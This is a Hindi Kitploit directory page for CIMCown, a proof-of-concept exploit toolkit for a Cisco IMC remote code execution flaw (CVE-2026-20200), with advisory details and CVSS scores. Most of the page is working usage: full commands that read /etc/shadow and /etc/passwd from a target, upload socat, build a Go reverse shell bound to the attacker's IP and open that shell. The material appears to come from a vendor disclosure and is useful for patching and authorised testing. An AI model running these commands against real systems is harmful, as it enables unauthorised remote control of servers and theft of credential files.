Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CIMCown — Cisco IMC RCE CVE-2026-20200 का शोषण करने के लिए PoC टूलकिट | Kitploit
उपकरण/GitHubGitHub/nside-attack-logic/cimcown
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubnside-attack-logic/cimcown

CIMCown

Cisco IMC RCE CVE-2026-20200 का शोषण करने के लिए PoC टूलकिट

रिपॉजिटरी देखें
111 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CIMCown

CVE-2026-20200 सिस्को IMC में RCE के साथ आर्ग्युमेंट इंजेक्शन

Christoph Peil @ NSIDE ATTACK LOGIC 2026

CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Advisory: NSIDE-SA-2026-003
Blogpost: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/

यह प्रूफ-ऑफ-कॉन्सेप्ट केवल प्रदर्शन उद्देश्यों के लिए है और इसे अवैध गतिविधियों के लिए उपयोग करने की अनुमति नहीं है। NSIDE ATTACK LOGIC इस कोड के उपयोग या दुरुपयोग से होने वाली किसी भी क्षति के लिए ज़िम्मेदार नहीं है।

यह एक्सप्लॉइट फ़ाइलें डाउनलोड करने, फ़ाइलें अपलोड करने और रिवर्स शेल स्पॉन करने की सुविधा देता है। इसमें PoC की कई पायथन फ़ाइलें, एक shell फ़ोल्डर और एक download फ़ोल्डर शामिल हैं।

download फ़ोल्डर में सर्वर से डाउनलोड की गई सभी फ़ाइलें उनके नाम के साथ रखी जाती हैं (जैसे /etc/passwd > passwd)।

shell फ़ोल्डर में रिवर्स शेल के लिए आवश्यक सब कुछ होता है। lib.so फ़ाइल ARM के लिए बनाई गई एक छोटी लाइब्रेरी है, जो IMC पर /tmp/main में बाइनरी को आसानी से निष्पादित करती है। इसे बनाने के लिए उपयोग किया गया सटीक कमांड util.py में मिलता है। साथ ही, फ़ोल्डर में एक reverse_shell.go.example भी है, जो एक छोटा Go रिवर्स शेल है, जिसे पहले से कंपाइल करना आवश्यक है, ताकि रिवर्स शेल के लिए उपयोग किया जाने वाला आपका स्थानीय IP शामिल हो सके।

रिवर्स शेल के काम करने के लिए, आपको पहले इसे -a build एक्शन के साथ बिल्ड करना होगा।

इंस्टॉलेशन:

root@kitploit:~
sudo apt install golang-go
pip install -r requirements.txt

उपयोग

root@kitploit:~
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
  -h, --help            show this help message and exit
  --proxy PROXY         Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
  -t, --host HOST       Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -U, --username USERNAME
  -P, --password PASSWORD
  -a, --action ACTION   Action: test, download, upload, build, shell (default: test)
						Test will connect to the CIMC and download the file /etc/passwd
  -u, --uploadFile UPLOADFILE
                        File to upload
  -p, --remoteFile REMOTEFILE
                        Remote file path to upload to
  -d, --downloadFile DOWNLOADFILE
                        File to download, is saved into 'Download'
  -v, --verbose         Displays more information about cimc

उदाहरण

उपयोगकर्ता और पासवर्ड के लिए बड़े U और बड़े P का ध्यान रखें!

टूल और लॉगिन का परीक्षण करें

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2

फ़ाइल /etc/shadow डाउनलोड करें

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2

फ़ाइल ./shell/socat को /tmp/socat पर अपलोड करें

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2

Go रिवर्स शेल बिल्ड करें

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a build

रिवर्स शेल प्राप्त करें

revShell में स्थानीय IP के लिए पहले एक्शन 'build' आवश्यक है
root@kitploit:~
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell
टूल डाउनलोड करें